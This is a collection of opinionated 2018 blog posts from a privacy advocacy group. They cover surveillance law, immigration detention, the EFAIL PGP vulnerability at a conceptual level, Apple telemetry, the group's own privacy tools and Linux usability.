Privacy advocates are cheering the outcome of Carpenter v. United States, in which the Supreme Court found that law enforcement and US government agencies must obtain a warrant before requesting an individual's cell-site location information (CSLI). However, in their 5-4 ruling, the justices explained,

This decision is narrow. It does not express a view on matters not before the Court; does not disturb the application of Smith and Miller or call into question conventional surveillance techniques and tools, such as security cameras; does not address other business records that might incidentally reveal location information; and does not consider other collection techniques involving foreign affairs or national security.

In his dissent Justice Gorsuch objected to the arbitrary nature of the ruling, which does not require a warrant for less than six days of records and does not cover "tower dumps", a download of all devices connected to a particular cell site - in real time or over a specified period. The ruling also exempts the private sale of CSLI to or among businesses, which may in turn hand over data to government agencies.

His opinion hardly deserves to be called "dissent"; Gorsuch made strong arguments in favor of privacy, directly attacking the 1979 Third-Party Doctrine a legal precedent under which, "a person has no legitimate expectation of privacy in information he voluntarily turns over to third parties."

Even taken on its own terms, Katz has never been sufficiently justified. In fact, we still don’t even know what its “reasonable expectation of privacy” test is. Is it supposed to pose an empirical question (what privacy expectations do people actually have) or a normative one (what expectations should they have)? Either way brings problems.

There is another way. From the founding until the 1960s, the right to assert a Fourth Amendment claim didn’t depend on your ability to appeal to a judge’s personal sensibilities about the “reasonableness” of your expectations or privacy. It was tied to the law.

Unwarranted Warrants

Despite the ruling, it is incredibly easy for law enforcement to obtain warrants. The US FISA Court approves 99.97% of all warrant requests, and The Salt Lake Tribune found judges spend mere seconds reviewing details of requests. Today that includes digital "e-warrants", which allow law enforcement agencies to request warrants without standing before a judge.

This is how e-warrants work: Police officers write a description of their credentials and why they need access to whatever they want to search. Then they submit it digitally to the Utah Criminal Justice Information System. An on-call judge receives a text or email alert, and that can come at any hour of the day. The judge then reviews the warrant and makes a critical decision: Is there probable cause to believe a crime has been committed? If so, the judge hits a button, granting permission for the officer to seek the evidence.

Companies like CloudGavel (an "Amazon technology partner") provide e-warrant services, making it easy for law enforcement to adopt this technology with little state or municipal oversight. One might argue e-warrants simply make government more efficient, but warrants should not be efficient; they are supposed to protect our liberties through careful deliberation. The "slow" nature of the justice system is designed to prevent abuse of citizen rights.

No Victory

The Carpenter v. United States decision may prove useful in setting precedent for further cases, but do not mistake a razor-thin step forward for outright victory. Those who wish to maintain their personal privacy should consider their CSLI up for grabs in almost every circumstance.

Published June 25, 2018

]]>

Tired of visiting "all the sites" to get your privacy news fix? So were we. So we built our own news aggregator, at Privc.io (pronounced "privacy dot io"). Headlines are refreshed every hour, on the hour.

This service is free, there are no ads, and we do not track visitors.

Published June 22, 2018

]]>

Human rights abuses occur at an alarming rate. Today there are more slaves around the world than at any time in human history. News reports - of human trafficking, police brutality, and torture - assault our sense of empathy and compassion, leaving us frustrated and desperate for answers. "Not our fight" we say, retreating into our disconnected lives.

Our charge is data privacy, and we make an effort to separate our personal politics from our public conversations. But there are some human rights abuses so terrible they must be addressed, no matter the cost to our business or reputation.

I have heard people ask how we, as a country, allowed the forced relocation and incarceration of over one hundred thousand Japanese Americans, including orphaned infants, in internment camps for four years. How had we abandoned our moral principles on such a horrific level?

In 2014, the Guardian reported over 50,000 unaccompanied children crossed into the US, a 250% increase from 2010. At that time, minors were returned back across the border, "provided they are not potential human trafficking victims or have a possible asylum claim" or handed over to the Office of Refugee Resettlement (ORR). The ACLU alleged widespread abuse ("verbal, sexual and physical abuse; prolonged detention in squalid conditions; and a severe lack of essential necessities such as beds, food and water") at the hands of border officials.

The complaint describes Border Patrol agents denying necessary medical care to children as young as five-months-old, refusing to provide diapers for infants, confiscating and not returning legal documents and personal belongings, making racially-charged insults and death threats, and strip searching and shackling children in three-point restraints during transport.

In 2016, a US Senate report found the Department of Health and Human Services (HHS) had placed immigrant children into the hands of traffickers, and failed to conduct background checks.

The traffickers would threaten the victims and their family members with physical harm, and even death, if they did not work or surrender their entire paychecks. The traffickers punished another minor victim when he complained about working at the egg farm by moving him to a different trailer "that was unsanitary and unsafe, with no bed, no heat, no hot water, no working toilets, and vermin." The traffickers then called the minor victim’s father and threatened to shoot the father in the head if the minor victim did not work.

On May 7, US Attorney General Sessions announced a new "zero tolerance" policy to forcibly separate illegal immigrants from their children, and to detain those children even in cases where their parents are returned back across the border. The policy has been criticized as a political tactic designed to force politicians to negotiate in favor of a proposed border wall.

If you are smuggling a child, then we will prosecute you and that child will be separated from you as required by law. If you don’t like that, then don’t smuggle children over our border. In order to carry out these important new enforcement policies, I have sent 35 prosecutors to the Southwest and moved 18 immigration judges to the border.

Attorney General Sessions, ASCIA 2018 Conference

Today there are twelve thousand minors in HHS custody, forcibly removed from their families. They are being held in makeshift prisons described as "cages" (concrete walls and steel fences). Children sleep on the floor, locked inside for 22 hours a day. As a country, we have kidnapped children from their parents and imprisoned them. Our tax dollars pay our government to carry out these actions, our corporations directly contribute, and we are all culpable. If a country is judged by how it treats its most vulnerable, be they citizens or asylum seekers, we have failed the test.

One might argue for long-term solutions to our manufactured immigration "crisis" (end the drug war, reinstate asylum protections, provide a realistic path toward productive citizenship) but this detatched and insensitive position glosses over the physical and emotional pain we are inflicting on innocent children right now. We do not have unlimited resources, but we plan to volunteer with the MIRA Coalition over the next few months, we plan to vote the proponents of this policy out of office, and we will continue this discussion whenever and wherever possible.

A Note About Microsoft

Let me preface by saying we have a strong bias against Microsoft. As a member of the NSA's PRISM surveillance program, Microsoft's actions are antithetical to our data privacy mission. Their flagship product is, in our view, purposefully designed to spy on its users.

Microsoft CEO Satya Nadella downplayed his company’s work with U.S. Immigration and Customs Enforcement in a company-wide email sent this evening, saying that Microsoft’s contract with ICE deals only with email, calendar, and messaging—not with separating children from their parents.

This morally bankrupt excuse bears a striking parallel to IBM, which once built computing machines explicitly for the Nazis (the machines were used to orchestrate the Holocaust, tracking oil supplies, train schedules for death camps, the victims themselves, and their bank accounts). In 1939, when confronted with the news that three million Jews would be killed in Poland, IBM released an internal memo:

The German managers of IBM Berlin sent a letter to Thomas Watson ... that, due to the "situation," they need high-speed alphabetizing equipment. IBM wanted no paper trail, so an oral agreement was made, passed from New York to Geneva to Berlin, and those alphabetizers were approved by Watson, personally, before the end of the month.

Published June 20, 2018

]]>

Silicon Valley "tech bros" like to tell us that privacy doesn't matter (while quietly profiting off those gullible enough to believe them) and our elected representatives frequently parrot their nonsense.

Earlier this week, the New Yorker published Why Do We Care So Much About Privacy?, a book promotion dressed up like an editorial. Meandering its way through an examination of US legal precedent since the second industrial revolution, the author eventually concludes that privacy looks a lot like liberty. How profound.

More disturbingly, he asserts the American concept of privacy is merely a by-product of 1890's US law and subsequent clashes with technological progress. Rubbish. As a fundamental component of democracy, privacy is much more enduring. All modern democracies trace their roots to the Athenian state, c. 300 BC.

A completely new element is thus introduced into the constitution: private ownership. According to the size of their property in land, the rights and duties of the citizens of the state are now assessed, and in the same degree to which the classes based on property gain influence, the old groups of blood relationship lose it.

Friedrich Engels, Origin of the Family, Private Property, and the State, 1884

Where there exists democratic capitalism, there must also exist the legal foundations of private ownership. This is the true origin of modern privacy, an idea which has survived global war, economic depression, and erosion by governments and corporations. Our personal privacy has come under attack throughout history, but privacy itself isn't "going away" any more than the production or consumption of goods.

And that, The New Yorker, is why we "care so much about privacy" - not for its legal precedents or its championed ideals, but because it is an institution which has shaped our world for over 2,300 years.

Published June 14, 2018

]]>

Convenience is often the enemy of security. OpenPGP offers end-to-end email encryption, and its authors are quick to point out their software is secure. But early today researchers announced a vulnerability in how PGP is used, which could expose email content in plain text.

Who Is Vulnerable?

Users who ignore best practices may be affected by the described attack. This includes: 1) upon receipt of encrypted email, decrypting it automatically in the email client, and 2) rendering HTML content in the email client.

An attacker with access to email (e.g. by eavesdropping on network traffic, compromising email accounts, or gaining remote access to a device) could add malicious code to an encrypted message. If the recipient's email client automatically decrypts the message to plain text, the malicious code collects that content and sends it to the attacker. This can be accomplished with a simple HTML image tag designed to load external content.

Keep It Simple

OpenPGP itself is not vulnerable to attack, but users who ignore best practices for the sake of convenience put themselves and their conversation partners at risk. As a general rule, we recommend users decrypt messages manually, or in an application other than their email client.

Published May 14, 2018

Update May 15, 2018

We reached out to SecureDrop to confirm their systems are not affected by the EFAIL vulnerability. Whistleblowers can continue to safely use their services.

]]>

Later this month the GDPR will take effect, and in adhering to its legal provisions, we're taking the opportunity to update our privacy policy. These changes reflect our organizational operations and our ethical perspectives.

Notification of Changes

Rev I. In the event this Policy is updated, changes will be posted on the Site no less than one week in advance so users remain aware of information collected, how it is used, and under what circumstances, if any, it is disclosed.

Rev II. In the event this Policy is updated, changes will be posted on the Site in detail so users remain aware of information collected, how it is used, and under what circumstances, if any, it is disclosed.

The original language focused on the timeliness of informing users of policy changes, while our new language holds us to a higher standard of explaining the changes. We believe it is disingenuous to introduce a new privacy policy, even in advance, without a straightforward explanation.

Protection of Financial Information

We removed this section in its entirety. The Financial Services Modernization Act of 1999 does not apply to our products or services, and we neither collect nor provide financial information.

Information Collection

Rev I. For the purposes of your privacy, this website does not collect any visitor metadata. All server-side logging has been permanently disabled, preventing collection of data such as date and time of access. Personally identifiable information is only ever collected through the encrypted contact form. The Site was solely designed and developed by Ethan Frederick Grant, and does not employ third-party software, javascript, or cookies.

Rev II. To ensure your privacy, this website does not collect any visitor metadata. All server-side logging has been permanently disabled, preventing collection of data such as date and time of access. The Site was carefully developed by hand, and does not use third-party software, analytics, or cookies.

Language regarding the contact form was moved to Protection of Communications which we feel is now more comprehensive (see below). We also call attention to the fact that the site is coded by hand, each line of code written with privacy in mind. Lastly, we replaced the reference to "javascript" with "analytics" because the main menu and contact form both require a few lines of javascript. We believe the new language clarifies our opposition to the collection of analytics, rather than use of javascript generally.

Protection of Children

Rev I. In accordance with the Children’s Online Privacy Protection Act of 1998, NefLabs does not knowingly collect Information from persons under the age of thirteen (13).

Rev II. In accordance with the General Data Protection Regulation of 2018, NefLabs does not knowingly collect Information from persons under the age of sixteen (16).

We find that the GDPR supersedes COPPA globally, and in an effort to maintain policies which reflect international law, we are raising the minimum age of persons from whom we may collect information.

Protection of Communications

Rev I. In accordance with the Electronic Communications Privacy Act of 1986, and in an effort to protect Information from subpoena, all Site-related email messages older than one-hundred eighty (180) days are deleted. All Site-based communications are encrypted for your privacy. The Site has never received an order to disclose the private decryption key to these communications.

Rev II. Messages received through the contact form are anonymous. In accordance with the Electronic Communications Privacy Act of 1986, and in an effort to protect Information from subpoena, messages older than seven (7) days are deleted. For your privacy, all messages received through the contact form are encrypted at rest with a rotating 4096-bit key. The Site has never received an order to disclose the private decryption key to these communications.

This section was updated to more accurately reflect our organizational operations. To clarify, we do not collect "email" on the site; our contact form stores messages as encrypted text. Although the ECPA allows us to hold messages up to 180 days without the potential for subpoena, we typically delete messages immediately after we receive them, and the new 7-day window is an honest reflection of our practices.

We also took the opportunity to clarify how messages received through the contact form are encrypted. Although messages are protected in transit using TLS 1.2, they are also encrypted at rest using a 4096-bit key, which is refreshed at random intervals.

If you have questions regarding our new policy, please reach out to us. We're happy to clarify our statements, address your concerns, and throw shade on corporations with terrible privacy policies.

Published May 04, 2018

]]>

Employers are growing desperate to prevent information leaks. The latest trend involves inserting zero-width (hidden) characters into documents. Employees receive what appears to be the same document, but each contains a unique digital fingerprint. If the document is leaked, the employer can trace it back to the person who was given that unique version. See a real-time example from Tom Ross.

How can whistleblowers fight back? Last month, Marco Chiappetta built a Chrome extension designed to replace zero-width characters with emoji. It's fun and funny, but it presents challenges for would-be whistleblowers: not every employee has administrative rights to install the Chrome browser or Chrome extensions at work, and it doesn't apply to content outside the browser, such as email.

So we built Fingertrap, comprised of 3 small files (110 kb) which can be put on a thumb drive or downloaded directly to the target computer. Users can paste any text into the tool, and it will identify fingerprinting characters in red.

You Can Help

Fingertrap is 100% free. Why? We believe payment information defeats user anonymity. No one should keep records of who uses our software, not even us. If you want to make a donation, sign up at our Patreon page, and help us continue to build and deliver free products.

Published May 01, 2018

]]>

Caddy was supposed to be great: a modern web server configured for TLS and HTTP2 out of the box. Apache and Microsoft IIS (both from 1995) look like dinosaurs next to the modern application written in Go.

Caddy is developed exclusively by Matt Holt. His online profile reflects Caddy's mission to, "deliver security and privacy to millions of users across the world".

"Earning your trust is my most important interpersonal goal ... I do my best to always follow Christ's example and include Him in everything I do."

Double Trouble

But just days after the Facebook/Cambridge Analytica scandal, Matt shocked the community by announcing the server software will soon collect telemetry from its users by default. The community responded with frustration and disappoinment:

"After the recent FaceBook fiasco I would have thought there would be more 'sensitivity' to thinking about privacy before jumping in with a de facto opt-in (and the potential that that choice brings)." - omz13

"While this feels more like a privacy issue than a security one, the whole opt-out thing just leaves me with a taste of 'Caddy is the HTTP/2 web server with automatic HTTPS. Now with added spying!'" - lucas

"I work with individuals using technology in oppressive regimes. What you're proposing, if not handled carefully, could literally have people imprisoned or murdered by their governments. We are just now embarking on a global debate over privacy. Respectfully, to implement default telemetry now ... is a slap in the face to many of us." - caddyhello

In our Weekly Privacy Discussion video, we called Matt out on his decision, and urged him to reconsider his stance for the sake of user privacy. User caddyhello posted a link to the video in the community thread on telemetry, twice. It was removed both times by Matt, claiming the video "does not add any value to the conversation".

Fork Caddy

Let's recap: the sole developer of Caddy is censoring his own userbase to make arbitrary decisions which run contrary to the original ethos of the application. This is no longer just a conversation on privacy; this is an issue of trust. If he says one thing ("Earning your trust is my most important interpersonal goal") but does the opposite, how can any server administrator trust Matt Holt or his software?

If we were Go developers, we would fork Caddy into a new application, and move on. But we're not full-time developers (if you are, here's your shot at fame) which leaves us reaching out to the larger tech community to discuss the future of web servers, default TLS, and HTTP2. Where do we go from here?

Published April 30, 2018

Update May 01, 2018

In a heated debate on Hacker News, Matt Holt continued to silence dissent, flagging the post and downvoting anyone who disagreed with him. He admitted, "I haven't actually watched the video", demonstrating his refusal to engage in a rational dialogue.

Another user suggested Armor, Traefik, and Wedge as alternatives to Caddy. We'll explore these options and review them soon.

]]>

In the late 1990's web developers were growing tired of combining every element - layout, design, and content - into a monolith of unmanageable code (in 2018, we're right back where we started, but more on that later). Updating even a few lines of content inside complex table layouts sometimes meant redesigning the entire site from scratch.

Eventual widespread adoption of Cascading Style Sheets (CSS) separated design from layout, but content was still hard-coded into the layout. To address this issue, employees at Netscape created a web syndication standard known as Rich Site Summary (RSS), which allowed web developers to place content in a discrete document. Updating content no longer required altering the design or layout of a website. More importantly, subscribing to an RSS feed removes the need for visitors to manually check a website for new content.

That might sound silly today, in an era of centralized services (e.g. Facebook, Google) bombarding our inboxes, phones, and "feeds". As privacy and security breaches make headlines, we clamor for a decentralized internet. But less than twenty years ago, the internet was decentralized, when the human cycle of individualism versus collectivism was perfectly aligned with divergent expression. We've now spent the past decade attempting to build the perfect centralized web, only to realize its many faults. The cycle continues.

The modern web looks remarkably similar to 90's monoliths of unmanageable code: overbuilt websites which load megabytes of resources, massive external javascript libraries, unnecessary analytics tools applied to "all the things", and advertising run amok. This leaning tower of jenga blocks lends itself neither to security nor to user privacy.

So the very idea of RSS - obtaining content from a website without having to visit the site itself - is due for a comeback. No ads. No suspicious javascript. Just the signal without the noise. It's not perfect privacy, but it's one step back and two steps forward in the right direction.

Published April 22, 2018

]]>

You want to make the world a better place. We want to help.

Almost every organization we work with has asked for the same two tools: encrypted messaging (we recommend Signal) and a platform for collaborative work. But few collaborative tools meet all of the requirements for anonymity and privacy: free, open-source, and self-hosted.

Activist organizations are instead turning to Google and Facebook as platforms for team collaboration, putting themselves in the legal crosshairs of corporations and governments. For the past two years, the Department of Justice has sought to criminalize activist organizations as a whole, based on the actions of a few members. In the course of one investigation, they issued warrants for the personal information of approximately 6,000 people who "liked" an anti-Trump Facebook page. In another investigation, Facebook simply handed over private account details despite the fact that no criminal charges had been filed.

Building A Better App

Your data belongs to you and your team, not government lawyers and spies. So we built c0llude with privacy from the ground up, under the following principles:

Open Source
Anyone can view and examine every line of our source code. You'll find that our software never tracks your activity, never phones home, and simply "does what it says on the box".

Self Hosted
Never trust another third-party platform with your data. Host unlimited instances of c0llude on any web server with PHP support, even your own web server at home.

Flat File
Databases are messy, and make backups annoying, even challenging. So we didn't use one. All user data is stored in flat files, which can be copied and migrated in a flash.

Long-Term Support
We believe in supporting our community by maintaining our software and responding quickly to our users. We'll offer long-term support to anyone who asks for it.

Revolutionary Inbox
Email is 1970's technology, it's unencrypted, and it's easily tracked by government agencies and malicious actors. So we built a flat-file inbox which keeps your messages private.

Download

Visit c0llude.com for installation instructions.

You Can Help

c0llude is 100% free. Why? We believe payment information defeats user anonymity. No one should keep records of who uses our software, not even us. If you want to make a donation, sign up at our Patreon page, and help us continue to build and deliver free products.

Published April 18, 2018

]]>

Arch Linux is a powerful, minimal operating system; it's the jackknife of the Linux community. Unlike a typical OS which releases a new version once a year, Arch is based on a "rolling-release" model, offering updates as soon as developers publish them. This makes it incredibly secure.

Arch purists are often called "elitist", and it's easy to see why: as a command-line system, it's the best. The installer is akin to a manual transmission; you do all the work, which gives you complete control of your system. And if that sounds difficult, it's not. Most of the installation involves two simple commands, pacstrap /mnt base and bootctl install. The included wifi-menu tool is on par with any graphical user interface (take note, Debian developers: installers without wifi firmware need to die in 2018) and the iptables firewall is installed by default.

In short, more people should use Arch Linux, but while developers love to tout their success with the OS, new users face unnecessary challenges.

Arch uses a tool called "pacman" (aka Package Manager) to install new software. But a majority of new and interesting packages reside in a walled garden called the Arch User Repository (AUR), and pacman can't install them; users are expected to build them. There are tools known as AUR Helpers but pacman can't install those either (in an episode of Frasier, he and his brother decide to buy a restaurant, and to make it exclusive, suggest no signs, no advertising, and an unlisted phone number - their father quips, "Don't stop there! Maybe you can post some guards on the roof who can shoot people as they try to get in!").

Arch also suffers from ecosystem fatigue: while developers have their heads down maintaining old packages, they miss new and exciting software. For example, Arch maintains the Chromium browser, the Linux fork of Google Chrome. But a much better, privacy-focused browser called UnGoogled Chromium has been released by independent developers. Arch has shelved it in the AUR, requiring a processor-intensive and lengthy manual build process, a huge turn-off for average users. Alternatively, one might try to download the binaries, but as users have pointed out,

"maybe it is because the binary is linked to debian's old libraries, saddly [sic], most of the required libraries doesn't exist in the aur ... sorry for any inconvenience ... I have no control over [them], all problems should go there."

But for many new users, the final straw lies in attempting to install a desktop environment (graphical user interface). Arch is known for maintaining a detailed knowledge base, but when it comes to desktop environments, relevant documentation is often missing or misleading, and what's left is written for Black Belt Developers. The result? Following the instructions to the letter leaves users with a half-built desktop.

Consider the Cinnamon desktop environment. It runs on the X Window System, which means users must first install, at a minimum: xorg, xorg-apps, and xorg-xinit packages. But the documentation for Cinnamon only says, "Cinnamon can be installed with the package cinnamon." Even the X Window System documentation fails to mention the xorg-xinit package. What fresh hell is this? Are new users expected to purchase a crystal ball?

Arch purists say the OS isn't meant to do #allthethings but at the end of the day, an operating system's value comes down to one question: can it be used as a daily computing environment? If the answer is no, then its features - simplicity, modernity, pragmatism, versatility - don't matter.

Let Pacman Run The Show

Pacman is already a versatile package manager, there's no need to reinvent the wheel with "helpers" like yaourt (in fact, let's retire the name "yaourt" and never speak of it again). In an ideal world, pacman would install packages from the AUR with a simple flag, pacman -a [package_name] and that's it. Leave the option for advanced users to compile packages from source, but for the rest of us, keep it simple.

Build It, And They Will Download

Arch developers pride themselves on doing things "the Arch way". Better. Faster. Efficient. So where's the official Arch desktop environment? It should be minimalist and easily installed from a single package group. The world is waiting, take the challenge and knock our socks off. Put Windows and MacOS to shame. Here's my ideal desktop environment:

Keyboard / Window Manager   xmodmap, xbindkeys, setxkbmap? Enough. Offer one tool to rule them all in a unified, editable configuration file. 2BWM is a great window manager, but it too needs an external settings file, no more recompiling config.h just to change a border color.

Terminal Emulator   Rxvt-unicode, using true semi-transparency by default, running SF Mono 12pt (which is beautiful in a terminal) or better yet, build a near-identical open source font and call it Arch Mono, use it for everything.

App Launcher   Rofi, running in fullscreen mode with true transparency by default. Use a massive font size to keep it easy to read. A single configuration file should allow users to add their own custom shortcuts to launch apps.

Browser   Ungoogled Chromium (of course). It should run incognito mode by default, and automatically clear cache / history / everything upon quit.

Pay It Forward

Those of us with money must step up and invest in developers who are creating the next generation of Unix applications. Give to Patrick Louis who created 2BWM, give to Matt DeVillier who works his ass off to provide upstream coreboot firmware, give to Eloston who builds the privacy-focused browser we all demanded, and give to all the designers on r/unixporn who showcase beautiful user interfaces of the future.

Published April 01, 2018

]]>

Switzerland has long been known for keeping the secrets of foreign governments and individuals, including financial transactions and more recently, digital transactions. For the past few years, startups have built encrypted software services (such as ProtonMail and ProtonVPN) on Swiss servers, away from the prying eyes of US intelligence services. Customers from around the world have relied on the sovereignty of Swiss borders - and Swiss courts - for digital privacy. But all of that could soon come crashing down.

In early March 2018, a series of new laws will allow "for the provision of information requests, real-time interceptions, retroactive interceptions (historical data), emergency searches and tracing" and require dozens of domestic ISPs to operate permanent surveillance systems.

"The ISP and the providers of communication services with more extensive information and monitoring obligations must retain the details of the telecommunications services for the purpose of identification for the duration of the customer relationship and for 6 months after the termination of the contract be able to deliver it."

These wide-sweeping laws affect internet access, email, and "other telecommunications services", including messaging services, social networking communications, cloud platforms, and proxy services. Businesses are expected to hand over customer data (name, date of birth, address, ID card number, IP address, etc) to authorities upon request.

Although the European Union is set to launch the General Data Protection Regulation (GDPR) to bolster digital privacy rights, Switzerland is not a member of the EU, which leaves Swiss citizens and their data exempt from protection.

A related upcoming Supreme Court battle between Microsoft and the US Department of Justice threatens to give US intelligence services the ability to seize foreign data without court approval. The final ruling could further damage public perception of Swiss privacy.

Published February 14, 2018

Update February 14, 2018

ProtonMail has reached out and pointed to a blog post from 2015, which suggests their email service will be "exempt",

"The new laws could compel us to hand over data that we have, but ... any obligations for service providers to remove encryption wouldn’t apply because the encryption is applied by the end-user on their device, and not by ProtonMail."

However, ProtonMail has not denied that they would be compelled to hand over unencrypted email sent or received via their email service, or if their VPN service will be forced to maintain and disclose user metadata and activity logs.

]]>

As a teen growing up in the 90's, I was obsessed with two things: posters of boys and cars on my bedroom walls, and owning an Apple computer. I spent hours modifying my Windows 98 SE desktop to look "like a Mac", hunting down Mac OS 9 desktop wallpapers, system icons, and themes which made my Start Menu look like an Apple logo.

Hooverphonic (Renaissance Affair), Nick Drake (Pink Moon), and J Ralph (One Million Miles Away) played in Volkswagen television ads. The world wide web was in the middle of a paradigm shift, as the first wave of user-generated content hit Tripod, Angelfire, and Geocities. In an era before blogs, personal websites gave users a sense of credibility and legitimacy as digital designers and self-proclaimed hackers. Sites built with Macromedia Flash generated respect among teen audiences for their epileptic seizure-inducing animations and autoplay music. Right-click blocking javascript, which prevented visitors from viewing a site's source code, was considered cool.

Apple found itself caught up in the fashion of the moment, its aqua style buttons and striped design elements mirrored on hundreds of thousands of personal websites alongside colors inspired by its Blueberry, Grape, Tangerine, Lime, and Strawberry iMac G3 computers. At the turn of the century, the iPod became the ultimate public statement of peer-to-peer music file sharing, popularized by Napster, Limewire, and Kazaa. Instead of competing on hardware specs, Apple offered a unique aesthetic and user experience to young tech evolutionaries, and captured a dedicated following.

No one understood this better than late CEO Steve Jobs, who famously prioritized product development, and warned that product companies led by sales and marketing executives were digging their own graves. Today, Apple is led by sales and marketing executives.

1999   PowerMac G4, graphite (Mac OS X 10.2 Jaguar)
2004   iBook G4 12-inch laptop, white (Mac OS X 10.3 Panther)
2004   AirPort Express, gen 1
2006   Macbook 13-inch laptop, white (Mac OS X 10.4 Tiger)
2010   iPhone 4, white (iOS 4)
2011   iPhone 4S, black (iOS 5)
2012   Macbook Pro Retina 13-inch laptop (Mac OS X 10.8 Mountain Lion)
2012   AirPort Express, gen 2
2013   iPhone 5S, space gray (iOS 7)
2014   iPad Mini 3, WiFi + Cellular, black
2015   Retina Macbook 12-inch laptop, gold (Mac OS X 10.11 El Capitan)
2016   Retina Macbook 12-inch laptop, space grey (MacOS 10.12 Sierra)
2016   iPhone 6S Plus, silver (iOS 9)
2017   Retina Macbook 12-inch laptop, space grey (MacOS 10.13 High Sierra)
2017   iPad Air 2, WiFi, black
2017   iPhone 7, black (iOS 10)

Above: A detailed list of product purchases from Apple, spanning almost two decades. Technically the PowerMac G4 was a gift from my Dad. Thanks Dad!

Apple's user experience has taken a back seat to unilateral and arbitrary decisions: useful ports have disappeared from laptops, fingerprint security was eliminated from their latest phone, dark patterns rule the mobile experience, MacOS and iOS suffer from an unending series of bugs and security vulnerabilities, the entire wireless router division was taken out back and shot years ago, and somehow prices are skyrocketing.

For years, Apple's prices were justified. Laptops built with an aluminum chassis, high quality components, an impenetrable unix-based operating system, excellent customer service and warranties. You got what you paid for, the products lasted forever, and so did their resale values. But $1,000 for an iPhone X? You've got to be kidding me. The lackluster iPhone 8, which sells for $700, still uses LCD screen technology and a proprietary lightning connector. Competitors like OnePlus offer a much more efficient AMOLED screen and USB-C charging - for $500.

Don't Confuse Security For Privacy

Starting with the iPhone 5S, Apple set the benchmark for mobile device security. Today's iOS devices offer a suite of security features, including a secure boot chain, secure enclave co-processor, AES 256-bit cryptography, and app code signing. Desktop products are similarly well equipped.

While hardware security will prevent a thief from digging through your personal or corporate secrets, it won't protect you from the No. 1 threat to your privacy: Apple. MacOS and iOS send an enormous amount of telemetry to Apple servers every minute, including during boot, bypassing user-based outbound firewall methods. Some MacOS services even send data over port 80, unencrypted!

Port   Hidden App   Outbound Connection

  80   avconferenced   ---   init.ess.apple.com
  80   captiveagent   ---   captive.apple.com
  80   identityservicesd   ---   init-p01md.apple.com
  80   itunes   ---   mgr.gcsp.cddbp.net
  80   systeminformation   ---   support-sp.apple.com

Port   Hidden App   Outbound Connection

 443   akd   ---   gsa.apple.com
 443   appstore   ---   itunes.apple.com
 443   appleidauthagent   ---   setup.icloud.com
 443   apsd   ---   albert.apple.com
 443   ckkeyrolld   ---   configuration.apple.com
 443   cloudd   ---   gateway.icloud.com
 443   geod.xpc   ---   ls.apple.com
 443   commerce   ---   init.itunes.apple.com
 443   keyboardservicesd   ---   configuration.apple.com
 443   mapspushd   ---   ls.apple.com
 443   nsurlsessiond   ---   valid.apple.com
 443   parsecd   ---   api.smoot.apple.com
 443   passd   ---   smp-device-content.apple.com
 443   photolibraryd   ---   ls.apple.com
 443   softwareupdated   ---   swscan.apple.com
 443   stocks.appex   ---   apple-finance.query.yahoo.com
 443   storeassetd   ---   buy.itunes.apple.com
 443   systemmigrationd   ---   swscan.apple.com
 443   touristd   ---   help.apple.com

Nefarious Laboratories also discovered Apple devices connect to smoot.apple.com every few seconds, relaying Safari and Spotlight search suggestions to Apple - even when users disable those features. They're essentially keyloggers. Apple devices also connect to apple-dns.net for DNS requests, bypassing your local network settings. This means every domain you visit, e.g. pornhub.com, is sent unencrypted over the internet to Apple.

Apple recently announced plans to hand control of Chinese customers' data to a state-run firm in China, raising further questions about how it handles private user data at home and abroad. With proposed legislation designed to open data to all levels of law enforcement, privacy advocates are especially concerned.

He's Dead, Jim

Do I regret living in Apple's ecosystem for almost two decades? Not at all. Apple once possessed an intangible magic which reflected their quirky, niche audience (artists, musicians, and software developers) who built their creative legacies by looking at the world sideways. But that magic is gone, leaving behind a rotten apple core. The company now spends its time chasing the Chinese market, building campuses fit for megalomaniacs, sacrificing privacy for convenience, and ignoring the pleas of its once loyal fan base. Die fetten jahre sind vorbei: The good times are over.

Published January 20, 2018

Update June 20, 2018

Quentin Carnicelli, founder of MacOS software development firm Rogue Amoeba, has publicly slammed the "sad state" of Apple's hardware lineup, which has been deteriorating for years.

]]>

While driving to work, you're stopped at a checkpoint. Customs and Border Protection (CBP) agents use drug-sniffing dogs to search your car. Your phone and laptop are confiscated, and agents demand your passwords. No warrant has been issued for this search, and probable cause is not required. Your fourth amendment rights do not apply. This is legal.

In 1953, the Department of Justice amended §287.1 of Title 8 of the Code of Federal Regulations, authorizing border patrol agents to search and interrogate, without warrant, any person within a 100-mile radius of United States borders. Originally designed to identify and detain persons suspected of being in the U.S. illegally, the scope of Title 8 continues to widen. Last year, CBP set up a checkpoint on I-93 in Woodstock, NH - approximately 75 miles from the Canadian border, to arrest citizens for drug possession. ACLU lawyer Buzz Scherr commented on the search.

"You know, what's so interesting in this case is the Chief of Police of Woodstock [Ryan Oleson] who was there afterwards said to the press, 'This was great - we got to go around the constitution because we had the feds do it - we wouldn't be able to do this by ourselves. But having that border patrol there allowed us to do it.' That was his statement to the press."

A Growing Threat To Civil Liberties

In Woodstock, police relied on a technique known as parallel construction in which law enforcement builds a second criminal investigation to conceal how the original investigation began. Although illegally obtained evidence (wiretaps, phone records, informant tips) may be thrown out in court, a second investigation may produce enough legal evidence to charge the suspect.

This week, the CBP issued Directive 3340-049A, Border Search Of Electronic Devices with instructions for border patrol agents to seize, search, and detain computers, tablets, phones, "and any other communication, electronic, or digital devices". The document reads like swiss cheese - a series of policy loopholes and vague language which gives the CBP broad, unchecked authority.

Under §5.2, information identified as protected by attorney-client privilege must be reviewed in coordination with the Associate/Assistant Chief Counsel Office, and business or commercial information is to be protected from unauthorized disclosure, but information "carried by journalists" receives neither protection.

§5.1.4 states that "advanced searches" - in which external equipment is used to download and store information from a device - must receive supervisory approval, "at the Grade 14 level or higher (or a manager with comparable responsibilities)." §5.1.5 then eliminates that requirement,

"In circumstances where operational considerations prevent a supervisor from remaining present for the entire advanced search, or where supervisory presence is not practicable, the examining Officer shall, as soon as possible, notify the appropriate supervisor about the search and any results thereof."

§5.4.1.1 and §5.4.1.2 define strict time limits for detention and destruction of seized information, yet §5.5.1.3 contradicts such data protections, noting,

"Nothing in this Directive limits the authority of CBP to share copies of information contained in electronic devices (or portions thereof), which are retained in accordance with this Directive, with federal, state, local, and foreign law enforcement agencies to the extent consistent with applicable law and policy."

Protecting Your Data

In 2017, CBP agents searched 30,200 devices, including those belonging to American citizens, a 60% increase from the previous year. When traveling abroad, citizens should avoid taking their phones and laptops with them. Instead, travelers should use burner phones and secondary laptops which can be easily wiped before handing them over.

